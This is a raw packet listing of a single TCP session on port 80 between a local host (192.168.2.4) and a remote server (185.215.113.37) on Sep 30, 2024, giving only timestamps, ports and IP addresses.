Sep 30, 2024 07:08:07.054130077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054143906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054145098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054169893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054184914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054194927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054198980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054224014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054224014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054239988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054240942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054255009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054270029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054284096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054284096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054294109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054312944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054312944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054328918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054342985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054356098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054358959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054373980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054374933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054419994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054426908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054440022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054449081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054455042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054467916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054475069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054502010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054527044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054543972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054558992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054572105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054580927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054586887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054601908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054601908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054616928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054617882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054634094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054639101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054652929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054673910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054680109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054692984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054703951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054719925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054745913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181391001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181418896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181447983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181467056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181473970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181499004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181515932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181516886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181516886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181526899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181535006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181549072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181550980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181565046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181566954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181583881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181592941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181607008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181607962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181632996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181647062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181647062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181663036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181672096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181687117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181701899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181710005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181718111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181732893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181744099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181749105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181763887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181765079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181792021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181792974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181807041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181822062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181823015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181854963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181874037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181890011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181891918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181905031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181921005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181927919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181940079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181943893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.181962013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.181984901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182001114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182015896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182022095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182039022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182061911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182076931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182085991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182090998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182116985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182121992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182132959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182140112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182149887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182167053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182173967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182188988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182189941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182210922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182225943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182234049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182245970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182255030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182260036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182275057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182288885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182296991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182312965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182323933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182327986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182341099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182344913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182363033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182374001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182399988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182415009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182429075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182431936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182449102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182456970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182466030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182480097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182483912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182497025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182503939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182513952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182519913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182535887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182554007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182570934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182573080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182588100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182601929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182615042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182643890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182651997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182657003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182672977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182687998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182699919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182719946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182739973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182769060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182784081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182799101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182809114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182821035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182837963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182837963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182852983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182867050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182872057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182883978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182904005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182921886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182921886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182940006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182961941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182976961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.182977915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.182985067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183001995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183012009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183031082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183032990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183049917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183067083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183079004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183087111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183119059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183137894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183144093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183156013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183171988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183197021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183201075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183216095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183221102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183238983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183252096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183307886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183321953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183331013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183337927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183353901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183434963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183449984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183464050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183465004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183475018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183481932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183497906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183512926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183512926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183542967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183554888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183562040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183572054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183588982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183602095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183605909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183619976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183640003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183655024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183662891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183666945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183684111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183727980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183768988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183782101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183796883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183811903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183819056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183835030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183837891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183871031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183897018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183933020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183948040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183964014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183974028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183979034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.183995008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.183995962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184014082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184019089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184039116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184056044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184057951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184072018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184087992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184098005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184113026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184123039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184128046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184142113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184143066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184159040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184173107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184175014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184206009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184222937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184231043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184246063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184262037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184276104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184292078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184295893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184308052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.184319973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.184353113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439331055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439371109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439400911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439426899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439444065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439459085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439475060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439490080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439505100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439517021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439521074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439537048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439553976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439564943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439574003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439585924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439601898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439615011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439626932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439637899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439646006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439667940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439672947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439682961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439694881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439698935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439711094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439718008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439733982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439743042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439749002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439763069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439775944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439789057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439801931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439805984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439820051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439822912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439832926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439837933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439858913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439874887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439896107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.439954042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439970016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.439985991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440001011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440001965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.440017939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440025091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.440037012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440045118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.440052986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440069914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.440069914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.440073967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440090895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440100908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.440107107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440123081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.440124989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440141916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.440155983 CEST	80	49730	185.215.113.37	192.168.2.4
